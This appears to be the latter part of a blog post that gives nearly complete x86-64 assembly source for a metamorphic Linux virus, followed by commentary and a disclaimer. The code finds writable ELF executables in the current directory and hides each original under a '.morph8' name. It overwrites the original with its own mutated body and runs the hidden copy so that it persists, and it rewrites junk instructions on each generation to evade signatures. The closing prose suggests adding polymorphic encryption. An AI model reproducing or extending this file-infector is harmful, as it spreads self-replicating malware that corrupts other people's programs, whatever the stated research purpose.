xor_keys db 0xAA, 0x55, 0xCC, 0x33, 0xFF, 0x88, 0x77
vierge_val db 1 ; first generation marker
signme dd 0xF00C0DE ; PRNG seed
section .bss
code resb 65536 ; viral body
codelen resq 1
vierge resb 1 ; generation flag
dir_buf resb 4096
temp_buf resb 1024
elf_header resb 64
; runtime decrypted strings
touch_cmd_fmt resb 32
chmod_cmd_fmt resb 32
touch_chmod_fmt resb 32
exec_cmd_fmt resb 32
cp_cmd_fmt resb 32
vxx_str resb 8
hidden_prefix resb 16
section .text
global _start
%define SYS_read 0
%define SYS_write 1
%define SYS_open 2
%define SYS_close 3
%define SYS_exit 60
%define SYS_lseek 8
%define SYS_getdents64 217
%define SYS_access 21
%define SYS_getrandom 318
%define SYS_execve 59
%define SYS_fstat 5
%define SYS_mmap 9
%define SYS_brk 12
%define SYS_fork 57
%define SYS_wait4 61
%define F_OK 0
%define X_OK 1
%define W_OK 2
%define O_RDONLY 0
%define O_WRONLY 1
%define O_RDWR 2
%define O_CREAT 64
%define O_TRUNC 512
%define PROT_READ 1
%define PROT_WRITE 2
%define MAP_PRIVATE 2
%define MAP_ANONYMOUS 32
section .rodata
shell_path db "/bin/sh",0
sh_arg0 db "sh",0
sh_arg1 db "-c",0
; syscall wrappers with junk insertion
sys_write:
mov rax, SYS_write
JUNK
syscall
ret
sys_read:
mov rax, SYS_read
JUNK
syscall
ret
sys_open:
mov rax, SYS_open
JUNK
syscall
ret
sys_close:
mov rax, SYS_close
syscall
ret
sys_lseek:
mov rax, SYS_lseek
syscall
ret
sys_access:
mov rax, SYS_access
syscall
ret
sys_getdents64:
mov rax, SYS_getdents64
syscall
ret
sys_exit:
mov rax, SYS_exit
syscall
; validate ELF executable target
is_elf:
push r12
push r13
mov rsi, O_RDONLY
xor rdx, rdx
call sys_open
test rax, rax
js .not_elf
mov r12, rax
mov rdi, r12
mov rsi, elf_header
mov rdx, 64
call sys_read
push rax
mov rdi, r12
call sys_close
pop rax
cmp rax, 64
jl .not_elf
; validate ELF magic
mov rsi, elf_header
cmp dword [rsi], 0x464C457F
jne .not_elf
; 64-bit only
cmp byte [rsi + 4], 2
jne .not_elf
; executable or shared object
mov ax, [rsi + 16]
cmp ax, 2
je .valid
cmp ax, 3
jne .not_elf
.valid:
mov rax, 1
jmp .done
.not_elf:
xor rax, rax
.done:
pop r13
pop r12
ret
; string utilities
basename: ; extract filename from path
mov rax, rdi
mov rsi, rdi
.find_last_slash:
mov bl, [rsi]
cmp bl, 0
je .done
cmp bl, '/'
jne .next_char
inc rsi
mov rax, rsi
jmp .find_last_slash
.next_char:
inc rsi
jmp .find_last_slash
.done:
ret
strlen:
mov rdi, rdi
xor rcx, rcx
.strlen_loop:
cmp byte [rdi + rcx], 0
je .strlen_done
inc rcx
jmp .strlen_loop
.strlen_done:
mov rax, rcx
ret
strcpy:
mov rdi, rdi
mov rsi, rsi
mov rax, rdi
.cp_loop:
mov bl, [rsi]
mov [rdi], bl
inc rdi
inc rsi
cmp bl, 0
jne .cp_loop
ret
strcmp:
push rdi
push rsi
.cmp_loop:
mov al, [rdi]
mov bl, [rsi]
cmp al, bl
jne .not_equal
test al, al
jz .equal
inc rdi
inc rsi
jmp .cmp_loop
.equal:
xor rax, rax
jmp .done
.not_equal:
movzx rax, al
movzx rbx, bl
sub rax, rbx
.done:
pop rsi
pop rdi
ret
strstr:
mov r8, rdi
mov r9, rsi
mov al, [r9]
test al, al
jz .found
.scan:
mov bl, [r8]
test bl, bl
jz .not_found
cmp al, bl
je .check_match
inc r8
jmp .scan
.check_match:
mov r10, r8
mov r11, r9
.match_loop:
mov al, [r11]
test al, al
jz .found
mov bl, [r10]
test bl, bl
jz .not_found
cmp al, bl
jne .next_pos
inc r10
inc r11
jmp .match_loop
.next_pos:
inc r8
jmp .scan
.found:
mov rax, r8
ret
.not_found:
xor rax, rax
ret
; PRNG
get_random:
mov eax, [signme]
mov edx, eax
shr edx, 1
xor eax, edx
mov edx, eax
shr edx, 2
xor eax, edx
mov [signme], eax
ret
get_range: ; random in [0, ecx), range passed in ecx
call get_random
xor edx, edx
div ecx
mov eax, edx
ret
; decrypt string with indexed key
d_strmain:
push rax
push rbx
push rcx
push rdx
push r8
mov r8, xor_keys
add r8, rcx
mov al, [r8]
mov rcx, rdx
; clear dest buffer
push rdi
push rcx
mov rdi, rsi
mov rcx, rdx
xor bl, bl
rep stosb
pop rcx
pop rdi
.d_loop:
test rcx, rcx
jz .d_done
mov bl, [rdi]
xor bl, al
mov [rsi], bl
inc rdi
inc rsi
dec rcx
jmp .d_loop
.d_done:
pop r8
pop rdx
pop rcx
pop rbx
pop rax
ret
; decrypt all strings at runtime
d_str:
push rdi
push rsi
push rdx
push rcx
mov rdi, touc
mov rsi, touch_cmd_fmt
mov rdx, 9
mov rcx, 0
call d_strmain
mov rdi, cmhd
mov rsi, chmod_cmd_fmt
mov rdx, 12
mov rcx, 1
call d_strmain
mov rdi, tchh
mov rsi, touch_chmod_fmt
mov rdx, 12
mov rcx, 2
call d_strmain
mov rdi, exec
mov rsi, exec_cmd_fmt
mov rdx, 5
mov rcx, 3
call d_strmain
mov rdi, cpcm
mov rsi, cp_cmd_fmt
mov rdx, 9
mov rcx, 4
call d_strmain
mov rdi, vxxe
mov rsi, vxx_str
mov rdx, 4
mov rcx, 5
call d_strmain
mov rdi, hidd
mov rsi, hidden_prefix
mov rdx, 8
mov rcx, 6
call d_strmain
pop rcx
pop rdx
pop rsi
pop rdi
ret
; 4 variants
spawn_junk:
push rbx
push rcx
push rdx
push r8
mov r8, rdi ; dst buffer
call get_random
and eax, 3 ; 4 variants
cmp eax, 0
je .variant_0
cmp eax, 1
je .variant_1
cmp eax, 2
je .variant_2
jmp .variant_3
.variant_0:
; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
mov byte [r8], 0x50
mov byte [r8+1], 0x53
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xC3
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xC3
mov byte [r8+8], 0x5B
mov byte [r8+9], 0x58
jmp .done
.variant_1:
; push rcx,rdx; xchg rcx,rdx; xchg rcx,rdx; pop rdx,rcx
mov byte [r8], 0x51
mov byte [r8+1], 0x52
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xCA
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xCA
mov byte [r8+8], 0x5A
mov byte [r8+9], 0x59
jmp .done
.variant_2:
; push rax,rcx; xchg rax,rcx; xchg rax,rcx; pop rcx,rax
mov byte [r8], 0x50
mov byte [r8+1], 0x51
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xC1
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xC1
mov byte [r8+8], 0x59
mov byte [r8+9], 0x58
jmp .done
.variant_3:
; push rbx,rdx; xchg rbx,rdx; xchg rbx,rdx; pop rdx,rbx
mov byte [r8], 0x53
mov byte [r8+1], 0x52
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xD3
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xD3
mov byte [r8+8], 0x5A
mov byte [r8+9], 0x5B
.done:
pop r8
pop rdx
pop rcx
pop rbx
ret
; file I/O
read_f:
push r12
push r13
push r14
push r15
mov r15, rsi ; save buffer pointer
mov rax, SYS_open
mov rsi, O_RDONLY
xor rdx, rdx
syscall
test rax, rax
js .error
mov r12, rax
mov rax, SYS_fstat
mov rdi, r12
sub rsp, 144
mov rsi, rsp
syscall
test rax, rax
js .close_e
mov r13, [rsp + 48] ; file size from stat
add rsp, 144
; bounds check
cmp r13, 65536
jle .size_ok
mov r13, 65536
.size_ok:
test r13, r13
jz .empty
xor r14, r14 ; bytes read cnt
.read_loop:
mov rax, SYS_read
mov rdi, r12
mov rsi, r15
add rsi, r14 ; offset into buffer
mov rdx, r13
sub rdx, r14 ; remaining bytes to read
jz .read_done
syscall
test rax, rax
jle .read_done ; EOF or error
add r14, rax
cmp r14, r13
jl .read_loop
.read_done:
mov rax, SYS_close
mov rdi, r12
syscall
mov rax, r14 ; return bytes read
jmp .done
.empty:
mov rax, SYS_close
mov rdi, r12
syscall
xor rax, rax
.done:
pop r15
pop r14
pop r13
pop r12
ret
.close_e:
add rsp, 144
mov rax, SYS_close
mov rdi, r12
syscall
.error:
mov rax, -1
pop r15
pop r14
pop r13
pop r12
ret
write_f:
push rbp
mov rbp, rsp
push r12
push r13
push r14
push r15
mov r12, rdi ; filename
mov r13, rsi ; buffer
mov r14, rdx ; size
; validate inputs
test r12, r12
jz .write_er
test r13, r13
jz .write_er
test r14, r14
jz .write_s
mov rdi, r12
mov rsi, O_WRONLY | O_CREAT | O_TRUNC
mov rdx, 0755o
call sys_open
cmp rax, 0
jl .write_er
mov r12, rax ; fd
xor r15, r15 ; bytes written cnt
.write_lp:
mov rdi, r12
mov rsi, r13
add rsi, r15 ; offset into buffer
mov rdx, r14
sub rdx, r15 ; remaining bytes
jz .write_c
call sys_write
JUNK
test rax, rax
jle .r_close
add r15, rax
cmp r15, r14
jl .write_lp
.write_c:
mov rdi, r12
call sys_close
.write_s:
xor rax, rax ; success
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
.r_close:
mov rdi, r12
call sys_close
.write_er:
mov rax, -1
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
; instruction generator
trace_op:
; bounds check
mov rax, [codelen]
cmp rsi, rax
jae .bounds_er
mov r8, code
add r8, rsi
; instruction size check
mov rax, [codelen]
sub rax, rsi
cmp rax, 3
jae .rex_xchg
cmp rax, 2
jae .write_prefix
cmp rax, 1
jae .write_nop
.bounds_er:
xor eax, eax
ret
.write_nop:
mov byte [r8], NOP
mov eax, 1
ret
.write_prefix:
; validate register (0-3 only)
cmp dil, 3
ja .bounds_er
call get_random
and eax, 5
movzx eax, byte [prefixes + rax]
mov [r8], al
call get_random
and eax, 3 ; rax,rbx,rcx,rdx only
shl eax, 3
add eax, 0xC0
add al, dil
mov [r8 + 1], al
mov eax, 2
ret
.rex_xchg:
; generate REX.W XCHG
cmp dil, 3
ja .bounds_er
; get different register
call get_random
and eax, 3
cmp al, dil
je .rex_xchg ; retry if same
; build REX.W XCHG r1, r2
mov byte [r8], REX_W
mov byte [r8 + 1], XCHG_OP
; ModR/M byte
mov bl, XCHG_BASE
mov cl, al
shl cl, 3
add bl, cl
add bl, dil
mov [r8 + 2], bl
mov eax, 3
ret
; instruction decoder
trace_jmp:
push rbx
push rcx
cmp rsi, [codelen]
jae .invalid
mov r8, code
mov al, [r8 + rsi]
; check for NOP
cmp al, NOP
je .ret_1
; check MOV+reg
mov bl, MOV
add bl, dil
cmp al, bl
je .ret_5
; check prefix instruction
mov rbx, prefixes
.check_prefix:
mov cl, [rbx]
test cl, cl
jz .invalid
cmp cl, al
je .check_second_byte
inc rbx
jmp .check_prefix
.check_second_byte:
inc rsi
cmp rsi, [codelen]
jae .invalid
mov al, [r8 + rsi]
cmp al, 0xC0
jb .invalid
cmp al, 0xFF
ja .invalid
and al, 7
cmp al, dil
jne .invalid
.ret_2:
mov eax, 2
jmp .done
.ret_1:
mov eax, 1
jmp .done
.ret_5:
mov eax, 5
jmp .done
.invalid:
xor eax, eax
.done:
pop rcx
pop rbx
ret
; junk mutation engine
replace_junk:
push r12
push r13
push r14
push r15
mov r8, [codelen]
test r8, r8
jz .done
cmp r8, JUNKLEN
jle .done
sub r8, JUNKLEN
mov r9, code
xor r12, r12
.scan_loop:
cmp r12, r8
jae .done
mov rax, [codelen]
cmp r12, rax
jae .done
; scan for junk pattern
movzx eax, byte [r9 + r12]
cmp al, PUSH
jb .next_i
cmp al, PUSH + 3 ; rax,rbx,rcx,rdx only
ja .next_i
; second byte must be PUSH
movzx ebx, byte [r9 + r12 + 1]
cmp bl, PUSH
jb .next_i
cmp bl, PUSH + 3
ja .next_i
; check REX.W prefix
cmp byte [r9 + r12 + 2], REX_W
jne .next_i
; check XCHG opcode
cmp byte [r9 + r12 + 3], XCHG_OP
jne .next_i
; validate complete sequence
call validate
test eax, eax
jz .next_i
; replace with new junk
call insert
.next_i:
inc r12
jmp .scan_loop
.done:
pop r15
pop r14
pop r13
pop r12
ret
; validate junk pattern
validate:
push rbx
push rcx
; extract registers from PUSH
movzx eax, byte [r9 + r12]
sub al, PUSH
mov bl, al ; reg1
movzx eax, byte [r9 + r12 + 1]
sub al, PUSH
mov cl, al ; reg2
; registers must differ
cmp bl, cl
je .invalid
; check POP sequence (reversed)
movzx eax, byte [r9 + r12 + 8]
sub al, POP
cmp al, cl
jne .invalid
movzx eax, byte [r9 + r12 + 9]
sub al, POP
cmp al, bl
jne .invalid
mov eax, 1 ; Valid sequence
jmp .done
.invalid:
xor eax, eax
.done:
pop rcx
pop rbx
ret
; insert new junk sequence
insert:
push rdi
mov rdi, r9
add rdi, r12
call spawn_junk
pop rdi
ret
;; shell command execution
exec_sh:
sub rsp, 0x40
mov qword [rsp], sh_arg0      ; argv[0] = "sh"
mov qword [rsp+8], sh_arg1    ; argv[1] = "-c"
mov qword [rsp+16], rdi       ; argv[2] = command string
mov qword [rsp+24], 0         ; argv terminator
mov rsi, rsp
xor rdx, rdx                  ; envp = NULL
mov rdi, shell_path
mov rax, SYS_execve
syscall
mov rdi, 1                    ; execve returns only on failure
call sys_exit
sh_arg0_ptr: dq sh_arg0
sh_arg1_ptr: dq sh_arg1
list: ; scan directory for infection targets
push rbp
mov rbp, rsp
push r12
push r13
push r14
push r15
mov r14, rsi
mov rdi, current_dir
mov rsi, O_RDONLY
mov rdx, 0
call sys_open
cmp rax, 0
jl .list_error
mov r12, rax
.list_loop:
mov rdi, r12
mov rsi, dir_buf
mov rdx, 4096
call sys_getdents64
cmp rax, 0
je .list_done
mov r13, rax
xor r15, r15
.list_entry:
cmp r15, r13
jge .list_loop
mov rdi, dir_buf
add rdi, r15
mov r8, rdi
add r8, 16
movzx rax, word [r8] ; d_reclen at offset 16
cmp rax, 19
jl .list_done ; malformed d_reclen - bail out (.skip_entry would pop an unpushed rax)
cmp rax, 4096
jg .list_done
push rax ; save d_reclen; .skip_entry pops it to advance r15
mov r8, rdi
add r8, 18
mov cl, [r8] ; d_type at offset 18
cmp cl, 8 ; DT_REG - regular files only
jne .skip_entry
add rdi, 19 ; d_name starts at offset 19
cmp byte [rdi], '.'
jne .check_file
mov r8, rdi
inc r8
cmp byte [r8], 0
je .skip_entry
mov r8, rdi
inc r8
cmp byte [r8], '.'
je .skip_entry
.check_file:
push rdi
mov rdi, r14
call basename
mov rsi, rax
mov rdi, [rsp]
call strcmp
pop rdi
test rax, rax
jz .chosen_one
push rdi
push rsi
push rbx
; Check if filename starts with .morph8
mov rsi, hidden_prefix
mov rbx, rdi
.see_hidden:
mov al, [rbx]
mov dl, [rsi]
test dl, dl
jz .is_hidden ; End of prefix - it's a hidden file
cmp al, dl
jne .not_hidden ; Mismatch - not hidden
inc rbx
inc rsi
jmp .see_hidden
.is_hidden:
pop rbx
pop rsi
pop rdi
jmp .skip_entry
.not_hidden:
pop rbx
pop rsi
pop rdi
mov rsi, vxx_str
call strstr
test rax, rax
jnz .found_vxx
push rdi
mov rsi, X_OK
call sys_access
pop rdi
cmp rax, 0
jne .not_exec
push rdi
mov rsi, W_OK
call sys_access
pop rdi
cmp rax, 0
jne .not_exec
jmp .e_conditions
.not_exec:
jmp .skip_entry
.e_conditions:
sub rsp, 256
mov r8, rsp
push rdi
mov rdi, r8
mov rsi, [rsp]
call hidden_name
mov rax, SYS_open
mov rdi, r8
mov rsi, O_RDONLY
xor rdx, rdx
syscall
pop rdi
test rax, rax
js .not_exists
; Hidden file exists - been here, skip it
push rdi
mov rdi, rax
call sys_close
pop rdi
add rsp, 256
jmp .skip_entry
.not_exists:
add rsp, 256
; Check if we're trying to infect ourselves
push rdi ; Save current filename
; Get our own basename
mov rdi, bin_name
call basename
mov rsi, rax
mov rdi, [rsp]
call strcmp
pop rdi
test rax, rax
jz .skip_self_infection ; If filenames match, skip infection
; Check if file is a valid ELF executable before infection
push rdi
call is_elf
pop rdi
test rax, rax
jz .skip_non_elf ; Not a valid ELF, skip infection
push rdi
call implant
pop rdi
jmp .skip_entry
.skip_self_infection:
; Don't infect ourselves, just skip
jmp .skip_entry
.skip_non_elf:
; Not a valid ELF executable, skip infection
jmp .skip_entry
.chosen_one:
push rdi
mov rsi, rdi
mov rdi, orig_exec_name
call strcpy
pop rdi
jmp .skip_entry
.found_vxx:
mov byte [vierge], 0
.skip_entry:
pop rax
add r15, rax
jmp .list_entry
.list_done:
mov rdi, r12
call sys_close
.list_error:
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
implant: ; infect target executable
push r12
push r13
mov r12, rdi
; Validate input
test r12, r12
jz .d_skip
push r12
mov rdi, r12
call strlen
pop r12
mov r13, rax
; Check filename length bounds
cmp r13, 200
jg .d_skip
test r13, r13
jz .d_skip
; Check if we have code to embed
mov rax, [codelen]
test rax, rax
jz .d_skip
cmp rax, 65536
jg .d_skip
; 1: Create hidden backup of original file
sub rsp, 768
mov rdi, rsp
add rdi, 512 ; Use third section for hidden name
mov rsi, r12
call hidden_name
; Check if hidden backup already exists
mov rax, SYS_open
mov rdi, rsp
add rdi, 512 ; hidden name
mov rsi, O_RDONLY
xor rdx, rdx
syscall
test rax, rax
js .fallback ; File doesn't exist, create backup
mov rdi, rax
call sys_close
jmp .infect_orgi ; Proceed to reinfect with new mutations
.fallback:
mov rdi, rsp ; Use first section for command
mov rsi, cp_cmd_fmt
mov rdx, r12 ; original filename
mov rcx, rsp
add rcx, 512 ; hidden name
call sprintf_two_args
mov rdi, rsp
call system_call
; Set permissions on hidden file
mov rdi, rsp
add rdi, 256 ; Use second section for chmod command
mov rsi, chmod_cmd_fmt
mov rdx, rsp
add rdx, 512 ; hidden name
call sprintf
mov rdi, rsp
add rdi, 256
call system_call
.infect_orgi:
add rsp, 768
; 2: Replace original file with viral code
mov rdi, r12 ; original filename
mov rsi, code
mov rdx, [codelen]
call write_f
.d_skip:
pop r13
pop r12
ret
;; payload execution
execute: ; virus payload
JUNK
mov rdi, msg_cat
call strlen
mov rdx, rax
mov rdi, 1
mov rsi, msg_cat
call sys_write
JUNK
ret
hidden_name: ; create .morph8
push rsi
push rdi
push rbx
push rcx
mov rbx, rsi
mov rcx, hidden_prefix
.check_prefix:
mov al, [rbx]
mov dl, [rcx]
test dl, dl
jz .already_one ; it matches
cmp al, dl
jne .add_prefix ; Mismatch
inc rbx
inc rcx
jmp .check_prefix
.already_one:
; File already has .morph8 prefix, just copy it
jmp .cp_file
.add_prefix:
; Add .morph8 prefix
mov byte [rdi], '.'
mov byte [rdi + 1], 'm'
mov byte [rdi + 2], 'o'
mov byte [rdi + 3], 'r'
mov byte [rdi + 4], 'p'
mov byte [rdi + 5], 'h'
mov byte [rdi + 6], '8'
add rdi, 7
.cp_file:
mov al, [rsi]
test al, al
jz .done
mov [rdi], al
inc rsi
inc rdi
jmp .cp_file
.done:
mov byte [rdi], 0
pop rcx
pop rbx
pop rdi
pop rsi
ret
sprintf: ; basic string formatting
push r9
push r10
mov r8, rdi ; dst
mov r9, rsi ; string
mov r10, rdx ; arg
.scan_format:
mov al, [r9]
test al, al
jz .done
cmp al, '%'
je .found_percent
mov [r8], al
inc r8
inc r9
jmp .scan_format
.found_percent:
inc r9
mov al, [r9]
cmp al, 's'
je .cp_arg
cmp al, '%'
je .cp_percent
; Unknown format, copy literally
mov byte [r8], '%'
inc r8
mov [r8], al
inc r8
inc r9
jmp .scan_format
.cp_percent:
mov byte [r8], '%'
inc r8
inc r9
jmp .scan_format
.cp_arg:
push r9
mov r9, r10
.cp_loop:
mov al, [r9]
test al, al
jz .cp_done
mov [r8], al
inc r8
inc r9
jmp .cp_loop
.cp_done:
pop r9
inc r9
jmp .scan_format
.done:
mov byte [r8], 0
pop r10
pop r9
ret
sprintf_two_args: ; string with two args
push rbp
mov rbp, rsp
push r10
push r11
push r12
mov r8, rdi ; dst buffer
mov r9, rsi ; string
mov r10, rdx ; 1 arg
mov r11, rcx ; 2 arg
xor r12, r12 ; arg cnt
.cp_loop:
mov al, [r9]
test al, al
je .done
cmp al, '%'
je .handle_format
mov [r8], al
inc r8
inc r9
jmp .cp_loop
.handle_format:
inc r9
mov al, [r9]
cmp al, 's'
je .cp_string
cmp al, '%'
je .cp_percent
mov byte [r8], '%'
inc r8
mov [r8], al
inc r8
inc r9
jmp .cp_loop
.cp_percent:
mov byte [r8], '%'
inc r8
inc r9
jmp .cp_loop
.cp_string:
cmp r12, 0
je .use_arg1
mov rdx, r11 ; second arg
jmp .do_cp
.use_arg1:
mov rdx, r10 ; first arg
.do_cp:
inc r12
push r9
push rdx
mov r9, rdx
.str_cp:
mov al, [r9]
test al, al
je .str_done
mov [r8], al
inc r8
inc r9
jmp .str_cp
.str_done:
pop rdx
pop r9
inc r9
jmp .cp_loop
.done:
mov byte [r8], 0
pop r12
pop r11
pop r10
pop rbp
ret
system_call: ; execute shell
push r12
mov r12, rdi
mov rax, SYS_fork
syscall
test rax, rax
jz .child_process
js .error
mov rdi, rax
xor rsi, rsi
xor rdx, rdx
xor r10, r10
mov rax, SYS_wait4
syscall
pop r12
ret
.child_process:
sub rsp, 32
mov qword [rsp], sh_arg0
mov qword [rsp+8], sh_arg1
mov qword [rsp+16], r12
mov qword [rsp+24], 0
mov rax, SYS_execve
mov rdi, shell_path
mov rsi, rsp
xor rdx, rdx
syscall
mov rax, SYS_exit
mov rdi, 1
syscall
.error:
pop r12
ret
;; entry point
_start:
; anti goes here
;avant:
call d_str ; Decrypt all
mov rax, SYS_getrandom
mov rdi, signme
mov rsi, 4
xor rdx, rdx
syscall
mov al, [vierge_val]
mov [vierge], al
pop rdi ; argc
mov rsi, rsp ; rsi = &argv[0]
push rsi
mov rdi, bin_name
mov rsi, [rsp]
mov rsi, [rsi] ; dereference: rsi = argv[0], the program path string
call strcpy
mov rdi, [rsp]
mov rdi, [rdi] ; dereference: rdi = argv[0]
call basename
mov rdi, orig_exec_name
mov rsi, rax
call strcpy
call execute
pop rsi
push rsi
; Read our own code
mov rdi, [rsi]
call read_code
mov rax, [codelen]
test rax, rax
jz .skip_mutation
; Apply mutations
call replace_junk
.skip_mutation:
pop rsi
push rsi
mov rdi, current_dir
mov rsi, [rsi]
call list
cmp byte [vierge], 1
jne .exec_theone
cmp byte [orig_exec_name], 0
jne .orig_name_ok
mov rdi, bin_name
call basename
mov rdi, orig_exec_name
mov rsi, rax
call strcpy
.orig_name_ok:
; Build hidden name for the chosen one
sub rsp, 512
mov rdi, rsp
add rdi, 256
mov rsi, orig_exec_name
call hidden_name
; Create touch command
mov rdi, rsp ; Use first half for command
mov rsi, touch_cmd_fmt
mov rdx, rsp
add rdx, 256 ; Point to hidden name
call sprintf
mov rdi, rsp
call system_call
; Create chmod command
mov rdi, rsp ; Reuse first half for command
mov rsi, touch_chmod_fmt
mov rdx, rsp
add rdx, 256 ; Point to hidden name
call sprintf
mov rdi, rsp
call system_call
add rsp, 512
.exec_theone:
mov rdi, bin_name
mov rsi, hidden_prefix
call strstr
test rax, rax
jnz .killme
; Build hidden name and execute it
sub rsp, 512
mov rdi, rsp
add rdi, 256 ; Use second half for hidden name
mov rsi, orig_exec_name
call hidden_name
; Create exec command
mov rdi, rsp ; Use first half for command
mov rsi, exec_cmd_fmt
mov rdx, rsp
add rdx, 256 ; Point to hidden name
call sprintf
mov rdi, rsp
call system_call
add rsp, 512
.killme:
; Clean up any leftovers
call zero0ut
pop rsi
xor rdi, rdi
mov rax, SYS_exit
syscall
zero0ut:
mov rdi, code
mov rcx, 65536
xor al, al
rep stosb
mov rdi, dir_buf
mov rcx, 4096
xor al, al
rep stosb
mov rdi, temp_buf
mov rcx, 1024
xor al, al
rep stosb
ret
read_code:
mov rsi, code
call read_f
test rax, rax
js .error
mov [codelen], rax
ret
.error:
mov qword [codelen], 0
ret
extract_v:
push r12
push r13
push r14
mov rdi, bin_name
mov rsi, code
call read_f
test rax, rax
js .err_v
cmp rax, 65536
jle .size_ok
mov rax, 65536
.size_ok:
mov [codelen], rax
jmp .ext_done
.err_v:
mov qword [codelen], 0
xor rax, rax
.ext_done:
pop r14
pop r13
pop r12
ret
This Is Only the Foundation
The code above exists to demonstrate core mechanisms, not to cover a complete system. Metamorphic and polymorphic engines go far deeper than what is shown here. What we have now is a starting point: sufficient to prove the concept, but still far from full-spectrum capability.
Currently, the mutation engine only processes its own defined junk patterns. It does not touch arbitrary instruction sequences. It also only supports basic register replacement so far. Features such as instruction reordering, control-flow rewriting, and logical substitution are absent.
Mutation patterns are hard-coded. There is no adaptive behavior. Propagation logic is also kept simple.
Each generation becomes different at the byte level, yet does the same things. What changes is the implementation, not the behavior. This is exactly why it shatters static signatures.
As the VX repeatedly reinfects, the code drifts further from its original form. The hidden backup mechanism helps it stay low-profile. The original file continues to run normally, allowing the VX to persist quietly.
Of course, these capabilities come at a cost: CPU and memory consumption, and doubled storage usage due to backups.
— Possibilities —
If you want to push further, you will need a larger pattern library, smarter runtime self-analysis, clean syscall abstraction for cross-platform support, and deeper code analysis with control-flow and data-flow mapping.
Combine it with polymorphism: encrypted payload + deformable code structure creates a layered system. Surface randomization, internal concealment, final behavior invariant. The adversary will find almost no stable anchor points.
Metamorphic code proves that software can continuously evolve its own implementation while keeping its goals unchanged.
I recommend running the code inside a debugger rather than executing it blindly. Set breakpoints and step down into the assembly layer to inspect exactly what is being generated. This is the best way to catch subtle anomalies.
That’s all for now — see you next time.
Disclaimer:
This blog post is provided solely for educational and research purposes. All technical details and code examples are intended to help defenders understand attack techniques and improve security posture. Please do not use this information to access or interfere with systems you do not own or lack explicit permission to test. Unauthorized use may violate laws and ethical standards. The author assumes no responsibility for any misuse or damage resulting from the application of the concepts discussed.



